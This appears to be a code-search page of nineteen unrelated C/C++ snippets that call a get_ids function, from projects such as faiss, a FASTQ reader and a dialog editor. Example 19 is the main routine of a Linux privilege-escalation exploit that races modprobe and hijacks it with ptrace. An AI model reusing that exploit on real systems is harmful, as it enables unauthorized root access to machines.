Example #1
void Database::DropIndex(SQLDropIndex& st)
{
	// Search every table for the first index whose name matches and erase it.
	for (auto tb = tbs_.begin(); tb != tbs_.end(); tb++)
	{
		for (auto idx = tb->get_ids().begin(); idx != tb->get_ids().end(); idx++)
		{
			if (idx->get_name() == st.get_index_name())
			{
				tb->get_ids().erase(idx);
				return;
			}
		}
	}
}
Example #2
File: Heap.cpp Project: edisonqkj/faiss
void HeapArray<C>::addn_with_ids (
     size_t nj, const T *vin, const TI *id_in,
     long id_stride, size_t i0, long ni)
{
    if (id_in == nullptr) {
        addn (nj, vin, 0, i0, ni);
        return;
    }
    if (ni == -1) ni = nh;
    assert (i0 >= 0 && i0 + ni <= nh);
#pragma omp parallel for
    for (size_t i = i0; i < i0 + ni; i++) {
        T * __restrict simi = get_val(i);
        TI * __restrict idxi = get_ids (i);
        const T *ip_line = vin + (i - i0) * nj;
        const TI *id_line = id_in + (i - i0) * id_stride;

        for (size_t j = 0; j < nj; j++) {
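            // Compare each incoming value against the current worst kept
            // element (simi[0]); when C::cmp says it is better, replace it
            // and record the caller-supplied id from id_line.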
            T ip = ip_line [j];
            if (C::cmp(simi[0], ip)) {
                heap_pop<C> (k, simi, idxi);
                heap_push<C> (k, simi, idxi, ip, id_line [j]);
            }
        }
    }
}
Example #3
int subsample(int nseqs, char *fastqfile, struct fastq *seqs[], int compressed) {


	// read the fastq file into a temporary hash
	struct fastq *allseqs[HASHSIZE] = {NULL};

	int read_seqs = 0;
	if (compressed)
		read_seqs = read_fastq_gz(fastqfile, allseqs);
	else
		read_seqs = read_fastq(fastqfile, allseqs);

	if (read_seqs < nseqs) {
		fprintf(stderr, "You requested %d sequences but there are only %d in the file!\n", nseqs, read_seqs);
		nseqs = read_seqs;
	}

	// get all the ids from the sequences
	char *ids[read_seqs];
	get_ids(ids, allseqs);

	// subsample those IDs 
	char **subsample = subsample_n(read_seqs, ids, nseqs);

	for (int i=0; i<nseqs; i++) {
		char *info = get_seq_information(subsample[i], seqs);
		char *seq = get_sequence(subsample[i], seqs);
		char *qua = get_quality(subsample[i], seqs);
	
	}
	return nseqs;
}
Example #4
bool Database::CheckIfIndexExists(string index_name)
{
	// Look through every table's indexes for one with the given name.
	for (auto tb = tbs_.begin(); tb != tbs_.end(); tb++)
	{
		for (auto idx = tb->get_ids().begin(); idx != tb->get_ids().end(); idx++)
		{
			if (idx->get_name() == index_name)
			{
				return true;
			}
		}
	}
	return false;
}
Example #5
#include <stdio.h>

/* get_ids() is defined elsewhere (in assembly; see Example #7).
 * The void return type here is an assumption based on how it is called. */
void get_ids(int *uid, int *gid);

int main()
{
    int uid, gid;

    get_ids(&uid, &gid);
    printf("User ID is %d. Group ID is %d.\n", uid, gid);
    return 0;
}
Example #6
/**
 * @brief Removes all dialogs with a specific prefix.
 * @param prefix The prefix id of dialogs to remove.
 * @return The list of all removed dialogs (key, value).
 * @throws EditorException in case of error.
 */
QList<QPair<QString, DialogData>> DialogsModel::delete_prefix(
    const QString& prefix) {

  QList<QPair<QString, DialogData>> list;
  for (QString key : get_ids(prefix)) {
    list.push_back(QPair<QString, DialogData>(key, get_dialog_data(key)));
    delete_dialog(key);
  }
  return list;
}
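A hypothetical call site for the function above (the helper name, the model reference and the "shop." prefix are illustrative only, not taken from the editor's own code):

#include <QDebug>

// Removes every dialog whose id starts with "shop." and logs what was removed.
// delete_prefix() may throw EditorException on error.
void remove_shop_dialogs(DialogsModel& model) {
  const QList<QPair<QString, DialogData>> removed = model.delete_prefix("shop.");
  for (const QPair<QString, DialogData>& pair : removed) {
    qDebug() << "Removed dialog" << pair.first;
  }
}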
Example #7
File: myids.c Project: arcticmatt/CS24
int main() {
    printf("Running myids\n");

    int uid, gid;
    // Call the assembly function I wrote
    get_ids(&uid, &gid);
    printf("User ID is %d. Group ID is %d.\n", uid, gid);

    return 0;
}
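The assembly routine called above is not shown on this page; a minimal C equivalent, assuming get_ids does nothing more than report the real user and group IDs through the caller's pointers, would be:

#include <unistd.h>

/* Hypothetical C version of the assembly get_ids used in Examples #5 and #7:
 * store the real user id and group id through the supplied pointers. */
void get_ids(int *uid, int *gid) {
    *uid = (int) getuid();
    *gid = (int) getgid();
}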
Example #8
/**
 * @brief Returns whether the prefix of dialog ids can be changed.
 * @param old_prefix[in] The prefix key of strings to change.
 * @param new_prefix[in] The new prefix to set.
 * @param id[out] The id that already exists in case of error.
 * @return @c true if the prefix can be changed.
 */
bool DialogsModel::can_set_dialog_id_prefix(
    const QString& old_prefix, const QString& new_prefix, QString& id) {

  for (QString prefixed_id : get_ids(old_prefix)) {

    prefixed_id.replace(QRegExp(QString("^") + old_prefix), new_prefix);
    if (dialog_exists(prefixed_id)) {
      id = prefixed_id;
      return false;
    }
  }
  return true;
}
Example #9
Process *get_process(pid_t pid) {
  /* TODO: Add test for invalid pid. Right now, we get a lot of errors and some
   * structure.*/
  Process *retval = (Process *)calloc(1, sizeof(Process));
  unsigned int *uids = NULL;
  unsigned int *gids = NULL;
  retval->pid = pid;
  retval->ppid = get_ppid(pid);
  retval->name = get_procname(pid);
  retval->exe = get_exe(pid);
  retval->cmdline = get_cmdline(pid);
  retval->create_time = get_create_time(pid);
  uids = get_ids(pid, "Uid:");
  if (uids) {
    retval->uid = uids[0];
    retval->euid = uids[1];
    retval->suid = uids[2];
    retval->username =
        get_username(retval->uid); /* Uses real uid and not euid */
  } else {
    retval->uid = retval->euid = retval->suid = 0;
    retval->username = NULL;
  }

  gids = get_ids(pid, "Gid:");
  if (gids) {
    retval->gid = gids[0];
    retval->egid = gids[1];
    retval->sgid = gids[2];
  } else {
    retval->gid = retval->egid = retval->sgid = 0;
  }

  retval->terminal = get_terminal(pid);
  free(uids);
  free(gids);
  return retval;
}
Example #10
Process *
get_process(unsigned pid)
{
  Process *retval = calloc(1, sizeof(Process));
  unsigned int *uids = NULL;
  unsigned int *gids = NULL;
  retval->pid = pid;
  retval->ppid = get_ppid(pid);
  retval->name = get_procname(pid);
  retval->exe = get_exe(pid);
  retval->cmdline = get_cmdline(pid);
  retval->create_time = get_create_time(pid);
  uids = get_ids(pid, "Uid:");
  if (uids) {
    retval->uid = uids[0];
    retval->euid = uids[1];
    retval->suid = uids[2];
    retval->username = get_username(retval->uid); /* Uses real uid and not euid */
  } else {
    retval->uid = retval->euid = retval->suid = 0;
    retval->username = NULL;
  }

  gids = get_ids(pid, "Gid:");
  if (gids) {
    retval->gid = gids[0];
    retval->egid = gids[1];
    retval->sgid = gids[2];
  } else {
    retval->gid = retval->egid = retval->sgid = 0;
  }

  retval->terminal = get_terminal(pid);
  if (uids) free(uids);
  if (gids) free(gids);
  return retval;
}
Example #11
/**
 * @brief Duplicates all dialogs with a given prefix.
 * @param prefix The prefix of the dialog ids to duplicate.
 * @param new_prefix The prefix to use for the duplicated dialogs.
 * @throws EditorException in case of error.
 */
void DialogsModel::duplicate_dialogs(
  const QString& prefix, const QString& new_prefix) {

  // Check if dialogs can be duplicated.
  QString id;
  if (!can_duplicate_dialogs(prefix, new_prefix, id)) {
    throw EditorException(tr("Dialog '%1' already exists").arg(id));
  }

  // Duplicate dialogs.
  for (QString id : get_ids(prefix)) {
    const auto& data = get_dialog_data(id);
    id.replace(QRegExp(QString("^") + prefix), new_prefix);
    create_dialog(id, data);
  }
}
Example #12
File: Heap.cpp Project: edisonqkj/faiss
void HeapArray<C>::addn (size_t nj, const T *vin, TI j0,
                         size_t i0, long ni)
{
    if (ni == -1) ni = nh;
    assert (i0 >= 0 && i0 + ni <= nh);
#pragma omp parallel for
    for (size_t i = i0; i < i0 + ni; i++) {
        T * __restrict simi = get_val(i);
        TI * __restrict idxi = get_ids (i);
        const T *ip_line = vin + (i - i0) * nj;

        for (size_t j = 0; j < nj; j++) {
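            // Same k-best heap update as addn_with_ids above, except the
            // stored id is the synthetic index j + j0 instead of a caller id.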
            T ip = ip_line [j];
            if (C::cmp(simi[0], ip)) {
                heap_pop<C> (k, simi, idxi);
                heap_push<C> (k, simi, idxi, ip, j + j0);
            }
        }
    }
}
Example #13
/**
 * @brief Changes the prefix of dialog ids.
 * @param old_prefix The prefix key of strings to change.
 * @param new_prefix The new prefix to set.
 * @return The new ids of the dialogs.
 * @throws EditorException in case of error.
 */
QList<QPair<QString, QString>> DialogsModel::set_dialog_id_prefix(
    const QString& old_prefix, const QString& new_prefix) {

  // Check if the prefix can be changed.
  QString id;
  if (!can_set_dialog_id_prefix(old_prefix, new_prefix, id)) {
    throw EditorException(tr("Dialog '%1' already exists").arg(id));
  }

  // Change the dialog ids.
  QList<QPair<QString, QString>> list;
  for (QString old_id : get_ids(old_prefix)) {

    QString new_id = old_id;
    new_id.replace(QRegExp(QString("^") + old_prefix), new_prefix);
    list.push_back(
      QPair<QString, QString>(old_id, set_dialog_id(old_id, new_id)));
  }
  return list;
}
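A hypothetical caller for the prefix-renaming operation above (again, the helper name, model reference and prefixes are illustrative):

#include <QDebug>

// Renames every dialog id starting with "shop." so that it starts with
// "store." and logs the mapping. Throws EditorException if one of the
// new ids already exists.
void rename_shop_dialogs(DialogsModel& model) {
  const QList<QPair<QString, QString>> renamed =
      model.set_dialog_id_prefix("shop.", "store.");
  for (const QPair<QString, QString>& pair : renamed) {
    qDebug() << pair.first << "->" << pair.second;
  }
}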
Example #14
static NV_INT32 get_lsurvey(FILE * infile, SURVEY * srv)
{
    NV_CHAR         buff[MBS];
    NV_INT32        i = (-1), n = 0;


    /* determine the id numbers of the lines & points */

    rewind(infile);
    n = 0;
    while (fgets(buff, MBS, infile) != NULL)
    {
	strtolower(buff);
	if (strncmp(buff, "line", 4) == 0)
	{
	    n += get_ids(buff, &srv->line[++i]);
	}
    }
    if (n != srv->n)
    {
	printf("get_survey:  warning got %d (!= %d) line ids\n", n, srv->n);
    }


    /* now fill in the points for each line */

    n = 0;
    for (i = 0; i < srv->n; i++)
    {
	n += get_points(infile, &srv->line[i]);
    }

    if (n != srv->n)
    {
	printf("get_dsurvey:  warning got %d (!= %d) lines\n", n, srv->n);
    }

    return n;

}				/* get_lsurvey */
Example #15
list<string>
get_ids (tree t) {
  if (is_nil (t->obs)) return list<string> ();
  list<observer> l= t->obs->get_tree_pointers ();
  return reverse (get_ids (l));
}
Example #16
list<string>
get_ids (list<observer> l) {
  if (is_nil (l)) return list<string> ();
  return pointer_resolve [l->item] * get_ids (l->next);
}
Example #17
int main(int argc, char **argv) {
	setlocale(LC_ALL, ""); // Comment-out on non-Posix systems
	clock_t time_start = clock();
	time_t time_t_start;
	time(&time_t_start);
	argv_0_basename = basename(argv[0]);
	get_usage_string(usage, USAGE_LEN); // This is a big scary string, so build it elsewhere

	//printf("sizeof(cmd_args)=%zd\n", sizeof(cmd_args));
	parse_cmd_args(argc, argv, usage, &cmd_args);

	if (cmd_args.class_algo == EXCHANGE || cmd_args.class_algo == EXCHANGE_BROWN)
		memusage += sizeof(float) * ENTROPY_TERMS_MAX; // We'll build the precomputed entropy terms after reporting memusage

	struct_model_metadata global_metadata;

	// The list of unique words should always include <s>, unknown word, and </s>
	map_update_count(&word_map, UNKNOWN_WORD, 0, 0); // Should always be first
	map_update_count(&word_map, "<s>", 0, 1);
	map_update_count(&word_map, "</s>", 0, 2);

	// Open input
	FILE *in_train_file = stdin;
	if (in_train_file_string)
		in_train_file = fopen(in_train_file_string, "r");
	if (in_train_file == NULL) {
		fprintf(stderr, "%s: Error: Unable to open input file  %s\n", argv_0_basename, in_train_file_string); fflush(stderr);
		exit(15);
	}

	// Process input sentences
	size_t input_memusage = 0;
	const struct_model_metadata input_model_metadata = process_input(cmd_args, in_train_file, &word_map, &initial_bigram_map, &input_memusage);
	memusage += input_memusage;
	fclose(in_train_file);

	clock_t time_input_processed = clock();
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Corpus processed in %'.2f CPU secs. %'lu lines, %'u types, %'lu tokens, current memusage: %'.1fMB\n", argv_0_basename, (double)(time_input_processed - time_start)/CLOCKS_PER_SEC, input_model_metadata.line_count, input_model_metadata.type_count, input_model_metadata.token_count, (double)memusage / 1048576); fflush(stderr);

	global_metadata.token_count = input_model_metadata.token_count;
	global_metadata.type_count  = map_count(&word_map);

	// Filter out infrequent words, reassign word_id's, and build a mapping from old word_id's to new word_id's
	sort_by_count(&word_map);
	word_id_t * restrict word_id_remap = calloc(sizeof(word_id_t), input_model_metadata.type_count);
	get_ids(&word_map, word_id_remap);
	word_id_t number_of_deleted_words = filter_infrequent_words(cmd_args, &global_metadata, &word_map, word_id_remap);

	// Get list of unique words
	char * * restrict word_list = (char **)malloc(sizeof(char*) * global_metadata.type_count);
	memusage += sizeof(char*) * global_metadata.type_count;
	reassign_word_ids(&word_map, word_list, word_id_remap);
	get_keys(&word_map, word_list);
	sort_by_id(&word_map);


	// Check or set number of classes
	if (cmd_args.num_classes >= global_metadata.type_count) { // User manually set number of classes is too low
		fprintf(stderr, "%s: Error: Number of classes (%u) is not less than vocabulary size (%u).  Decrease the value of --classes\n", argv_0_basename, cmd_args.num_classes, global_metadata.type_count); fflush(stderr);
		exit(3);
	} else if (cmd_args.num_classes == 0) { // User did not manually set number of classes at all
		cmd_args.num_classes = (wclass_t) (sqrt(global_metadata.type_count) * 1.2);
	}

	// Build array of word_counts
	word_count_t * restrict word_counts = malloc(sizeof(word_count_t) * global_metadata.type_count);
	memusage += sizeof(word_count_t) * global_metadata.type_count;
	build_word_count_array(&word_map, word_list, word_counts, global_metadata.type_count);

	// Initialize clusters, and possibly read-in external class file
	wclass_t * restrict word2class = malloc(sizeof(wclass_t) * global_metadata.type_count);
	memusage += sizeof(wclass_t) * global_metadata.type_count;
	init_clusters(cmd_args, global_metadata.type_count, word2class, word_counts, word_list);
	if (initial_class_file != NULL)
		import_class_file(&word_map, word2class, initial_class_file, cmd_args.num_classes); // Overwrite subset of word mappings, from user-provided initial_class_file

	// Remap word_id's in initial_bigram_map
	remap_and_rev_bigram_map(&initial_bigram_map, &new_bigram_map, &new_bigram_map_rev, word_id_remap, map_find_id(&word_map, UNKNOWN_WORD, -1));
	global_metadata.start_sent_id = map_find_id(&word_map, "<s>", -1); // need this for tallying emission probs
	global_metadata.end_sent_id   = map_find_id(&word_map, "</s>", -1); // need this for tallying emission probs
	global_metadata.line_count    = map_find_count(&word_map, "</s>"); // Used for calculating perplexity

	if (global_metadata.line_count == 0) {
		fprintf(stderr, "%s: Warning: Number of lines is 0.  Include <s> and </s> in your ngram counts, or perplexity values will be unreliable.\n", argv_0_basename); fflush(stderr);
	}

	//printf("init_bigram_map hash_count=%u\n", HASH_COUNT(initial_bigram_map)); fflush(stdout);
	//printf("new_bigram_map hash_count=%u\n", HASH_COUNT(new_bigram_map)); fflush(stdout);
	free(word_id_remap);
	memusage -= sizeof(word_id_t) * input_model_metadata.type_count;
	delete_all(&word_map); // static
	delete_all_bigram(&initial_bigram_map); // static
	memusage -= input_memusage;

	// Initialize and set word bigram listing
	clock_t time_bigram_start = clock();
	size_t bigram_memusage = 0; size_t bigram_rev_memusage = 0;
	struct_word_bigram_entry * restrict word_bigrams = NULL;
	struct_word_bigram_entry * restrict word_bigrams_rev = NULL;

	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Word bigram listing ... ", argv_0_basename); fflush(stderr);

	#pragma omp parallel sections // Both bigram listing and reverse bigram listing can be done in parallel
	{
		#pragma omp section
		{
			//sort_bigrams(&new_bigram_map); // speeds things up later
			word_bigrams = calloc(global_metadata.type_count, sizeof(struct_word_bigram_entry));
			memusage += sizeof(struct_word_bigram_entry) * global_metadata.type_count;
			bigram_memusage = set_bigram_counts(word_bigrams, new_bigram_map);
			// Copy entries in word_counts to struct_word_bigram_entry.headword_count since that struct entry is already loaded when clustering
			for (word_id_t word = 0; word < global_metadata.type_count; word++)
				word_bigrams[word].headword_count = word_counts[word];
		}

		// Initialize and set *reverse* word bigram listing
		#pragma omp section
		{
			if (cmd_args.rev_alternate) { // Don't bother building this if it won't be used
				//sort_bigrams(&new_bigram_map_rev); // speeds things up later
				word_bigrams_rev = calloc(global_metadata.type_count, sizeof(struct_word_bigram_entry));
				memusage += sizeof(struct_word_bigram_entry) * global_metadata.type_count;
				bigram_rev_memusage = set_bigram_counts(word_bigrams_rev, new_bigram_map_rev);
				// Copy entries in word_counts to struct_word_bigram_entry.headword_count since that struct entry is already loaded when clustering
				for (word_id_t word = 0; word < global_metadata.type_count; word++)
					word_bigrams_rev[word].headword_count = word_counts[word];
			}
		}
	}

	delete_all_bigram(&new_bigram_map);
	delete_all_bigram(&new_bigram_map_rev);
	memusage += bigram_memusage + bigram_rev_memusage;
	clock_t time_bigram_end = clock();
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "in %'.2f CPU secs.  Bigram memusage: %'.1f MB\n", (double)(time_bigram_end - time_bigram_start)/CLOCKS_PER_SEC, (bigram_memusage + bigram_rev_memusage)/(double)1048576); fflush(stderr);

	//print_word_bigrams(global_metadata, word_bigrams, word_list);

	// Build <v,c> counts, which consists of a word followed by a given class
	word_class_count_t * restrict word_class_counts = calloc(1 + cmd_args.num_classes * global_metadata.type_count , sizeof(word_class_count_t));
	if (word_class_counts == NULL) {
		fprintf(stderr,  "%s: Error: Unable to allocate enough memory for <v,c>.  %'.1f MB needed.  Maybe increase --min-count\n", argv_0_basename, ((cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t)) / (double)1048576 )); fflush(stderr);
		exit(13);
	}
	memusage += cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t);
	fprintf(stderr, "%s: Allocating %'.1f MB for word_class_counts: num_classes=%u x type_count=%u x sizeof(w-cl-count_t)=%zu\n", argv_0_basename, (double)(cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t)) / 1048576 , cmd_args.num_classes, global_metadata.type_count, sizeof(word_class_count_t)); fflush(stderr);
	build_word_class_counts(cmd_args, word_class_counts, word2class, word_bigrams, global_metadata.type_count/*, word_list*/);
	//print_word_class_counts(cmd_args, global_metadata, word_class_counts);

	// Build reverse: <c,v> counts: class followed by word.  This and the normal one are both pretty fast, so no need to parallelize this
	word_class_count_t * restrict word_class_rev_counts = NULL;
	if (cmd_args.rev_alternate) { // Don't bother building this if it won't be used
		word_class_rev_counts = calloc(1 + cmd_args.num_classes * global_metadata.type_count , sizeof(word_class_count_t));
		if (word_class_rev_counts == NULL) {
			fprintf(stderr,  "%s: Warning: Unable to allocate enough memory for <v,c>.  %'.1f MB needed.  Falling back to --rev-alternate 0\n", argv_0_basename, ((cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t)) / (double)1048576 )); fflush(stderr);
			cmd_args.rev_alternate = 0;
		} else {
			memusage += cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t);
			fprintf(stderr, "%s: Allocating %'.1f MB for word_class_rev_counts: num_classes=%u x type_count=%u x sizeof(w-cl-count_t)=%zu\n", argv_0_basename, (double)(cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t)) / 1048576 , cmd_args.num_classes, global_metadata.type_count, sizeof(word_class_count_t)); fflush(stderr);
			build_word_class_counts(cmd_args, word_class_rev_counts, word2class, word_bigrams_rev, global_metadata.type_count/*, word_list*/);
		}

	}

	// Calculate memusage for count_arrays
	for (unsigned char i = 1; i <= cmd_args.max_array; i++) {
		memusage += 2 * (powi(cmd_args.num_classes, i) * sizeof(wclass_count_t));
		//printf("11 memusage += %zu (now=%zu) count_arrays\n", 2 * (powi(cmd_args.num_classes, i) * sizeof(wclass_count_t)), memusage); fflush(stdout);
	}

	clock_t time_model_built = clock();
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Finished loading %'lu tokens and %'u types (%'u filtered) from %'lu lines in %'.2f CPU secs\n", argv_0_basename, global_metadata.token_count, global_metadata.type_count, number_of_deleted_words, global_metadata.line_count, (double)(time_model_built - time_start)/CLOCKS_PER_SEC); fflush(stderr);
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Approximate memory usage at clustering: %'.1fMB\n", argv_0_basename, (double)memusage / 1048576); fflush(stderr);

	cluster(cmd_args, global_metadata, word_counts, word_list, word2class, word_bigrams, word_bigrams_rev, word_class_counts, word_class_rev_counts);

	// Now print the final word2class mapping
	if (cmd_args.verbose >= 0) {
		FILE *out_file = stdout;
		if (out_file_string)
			out_file = fopen(out_file_string, "w");
		if (out_file == NULL) {
			fprintf(stderr, "%s: Error: Unable to open output file  %s\n", argv_0_basename, out_file_string); fflush(stderr);
			exit(16);
		}
		if (cmd_args.class_algo == EXCHANGE && (!cmd_args.print_word_vectors)) {
			print_words_and_classes(out_file, global_metadata.type_count, word_list, word_counts, word2class, (int)cmd_args.class_offset, cmd_args.print_freqs);
		} else if (cmd_args.class_algo == EXCHANGE && cmd_args.print_word_vectors) {
			print_words_and_vectors(out_file, cmd_args, global_metadata, word_list, word2class, word_bigrams, word_bigrams_rev, word_class_counts, word_class_rev_counts);
		}
		fclose(out_file);
	}

	clock_t time_clustered = clock();
	time_t time_t_end;
	time(&time_t_end);
	double time_secs_total = difftime(time_t_end, time_t_start);
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Finished clustering in %'.2f CPU seconds.  Total wall clock time was about %lim %lis\n", argv_0_basename, (double)(time_clustered - time_model_built)/CLOCKS_PER_SEC, (long)time_secs_total/60, ((long)time_secs_total % 60)  );

	free(word2class);
	free(word_bigrams);
	free(word_list);
	free(word_counts);
	exit(0);
}
Example #18
int main(int argc, char *argv[]) {
	// this file has 5 sequences in it so it should be easy to read!
	char *filename = "../example_data/small.fastq.gz";
	struct fastq *seqs[HASHSIZE] = {NULL};
	int nseqs = read_fastq_gz(filename, seqs);
	int error = 0;
	if (nseqs != ESEQS) {
		fprintf(stderr, "There was an error reading %s. We retrieved %d sequences but should have found %d sequences\n", filename, nseqs, ESEQS);
		error = 1;
	}

	/* now test the get sequence methods */
	int nnseqs = number_of_sequences(seqs);
	if (nnseqs != ESEQS) {
		printf("There was an error checking the number of sequences. We found %d using number_of_sequences but it should be %d\n", nnseqs, ESEQS);
		error++;
	}

	/* test getting the ids */
	char *ids[nnseqs];
	int nnseqsids = get_ids(ids, seqs);
	if (nnseqsids != nnseqs) {
		printf("There was an error when we got the ids. This returned %d ids but it should be %d\n", nnseqsids, nnseqs);
		error++;
	}
	printf("Got %d ids\n", nnseqsids);
	for (int i=0; i<nnseqsids; i++)
		printf("ID %d: %s\n", i, ids[i]);
	

	char *sq = get_sequence("@GFH7CG303FQFE8/1", seqs);
	char *sqans = "AAATACGGGTAGATATACCGCCATGTCTCGCAAACAGCCTCATCATGCCGCGCCTGCCCACTTTTTTGCATCAGTATCCCGGCATTGCGCTGGAACTTTGTAGTAGCGATCGACAGGTCGATTTACTACGGGAAGATTTCGACTGCGTGGTGCGCACAGAGCCGCTACATGCGCCAGGGATACTGACGCGCCCGCTTGGCAAACTGAGAAGAGTGAACTGCGCCAGCCCACAATACCTGGCGCGCTTTGGGTAATCCAGAAAAACCTTGACGATCTCGCCTCACATGCGGTGGTGCATTATTCATTGACCCCGGGAGTTTCTTCACCGGGTTTTGCCTTTGAAACTCCCACGGTATGCAGTGGTAAAAAACCGGCGGAAATGCTAACGGTAAACAGTACGAGACTTGGCATACAGCCTG";
	char *quans = "@@@DDDDDFFFIIIIIIIIIIIIIIIIIIIIHHHIIFDDHHHHHHHHHHHHHFFFFFFFFF666666FFFFFFFFFFFFFCCADDDFDDCDDDDDD???6388CFFCCCCCDFFFFFDFFFF??8638<FF?AA>DFFFAA<<<FFFFFAACCFF???CFDDDDBBBBBBA<<889;888<<===BBBBB=;;A688<<9...3<4434443<<AAAAA??A==<>8624/2642..028>=<9989<<;4/..6;;<:,,,--..<<==:9<<<A<4444<=<<733224000<><8::CGGDDDDB::99400/0444322576;622....266666<68899444:8A?\?\?=>>>:3//.------55--266...3777666646...6297...269766///3:<><>;;93";
	if (sq == NULL) {
		fprintf(stderr, "Bugger, no sequence for @GFH7CG303FQFE8/1\n");
		error++;
	}

	if (strcmp(sq, sqans)) {
		error++;
		printf("The sequence we retrieved for @GFH7CG303FQFE8/1 appeared to be wrong:\n%s\n", sq);
	}

	sq = get_sequence("NOSEQ", seqs);
	if (sq != NULL) {
		fprintf(stderr, "Using ID NOSEQ we retrieved %s\n", sq);
		error++;
	}


	char *qual = get_quality("@GFH7CG303FQFE8/1", seqs);
	if (strcmp(qual, quans)) {
		fprintf(stderr, "The quality scores for @GFH7CG303FQFE8/1 do not appear correct\n");
		error++;
	}

	qual = get_quality("NOSEQ", seqs);
	if (qual != NULL) {
		fprintf(stderr, "Got %s as quality scores for NOSEQ but shouldn't find any!\n", qual);
		error++;
	}

	char *info = get_seq_information("@GFH7CG303FQFE8/1", seqs);
	if (strcmp("@GFH7CG303FQFE8/1 length=419 xy=2234_0770 region=3 run=R_2010_04_12_12_22_54_", info)) {
		printf("TEST: The information for @GFH7CG303FQFE8/1 was unexpected: '%s'\n", info);
		error++;
	}



	
	if (error) 
		fprintf(stderr, "There were %d errors when running the tests\n", error);
	else
		fprintf(stderr, "All tests passed\n");
	
	exit(error);

}
Example #19
int main(int ac, char **av)
{
    int fd, pid, p, i;
    char buf[TMPSIZE];
    struct uids uids;
    FILE *fp;


    setpgrp();
    setsid();
    umask(022);
    unlink(SHELL);
    fd = open(SHELL, O_RDWR | O_CREAT | O_TRUNC, 0755);
    fp = fdopen(fd, "w+");
    fprintf(fp, "%s\n", shellcmd);
    fclose(fp);

    pid = getpid() + 2;
    snprintf(buf, sizeof(buf) - 1, "/proc/%d/status", pid);
    printf("\nModprobe pid %d, my pid %d", pid, getpid());
    fflush(stdout);
    signal(SIGUSR1, sighnd);

//      fork modprobe helper
    if (!(p = fork())) {
//      some nice work for exec_usermodehelper(), keep it busy!
	for (i = 0; i < FMAX; i++) {
	    fd = open("/dev/zero", O_RDWR);
	    mmap(NULL, MMSIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
	}
	kill(getppid(), SIGUSR1);
	while (!sig);
	printf("\nHelper (pid %d) requesting module...", getpid());
	fflush(stdout);
	fd = open(ENTRY, O_RDONLY | O_NONBLOCK);
	exit(0);
    }
//      synchronize with the child
    else {
	while (!sig);
	kill(p, SIGUSR1);

//      wait for modprobe to run at unprivileged level
	while (1) {
	    fd = open(buf, O_RDONLY);
	    if (fd > 0) {
		if (!(fp = fdopen(fd, "r")))
		    fatal("fdopen");
		if (get_ids(fp, &uids) != 4
		    || (uids.uid != uids.euid || uids.uid != uids.suid
			|| uids.uid != uids.fsuid)) {
		    fatal("did not catch modprobe...try again later :-)");
		}
//      ok, it runs...
		while (1) {
		    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL)) {
			fatal("PTRACE_ATTACH failed!");
		    } else {
			i = 0;
			printf("\nAttached afterburner...\n");
			fflush(stdout);
			while (ptrace(PTRACE_GETREGS, pid, 0, &regs)
			       || !regs.eip || regs.eip >= MAXSTACK) {
			    ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
			    printf("\rplease wait %d", i++);
			    fflush(stdout);
			}
			waitpid(pid, NULL, WUNTRACED);
			printf
			    ("\nValid EIP found EIP=%p\nexploiting the bug, good luck... ",
			     regs.eip);
			fflush(stdout);
			exploit(pid);
			exit(0);
		    }
		}
		fclose(fp);
	    }
	}
    }

    return 0;
}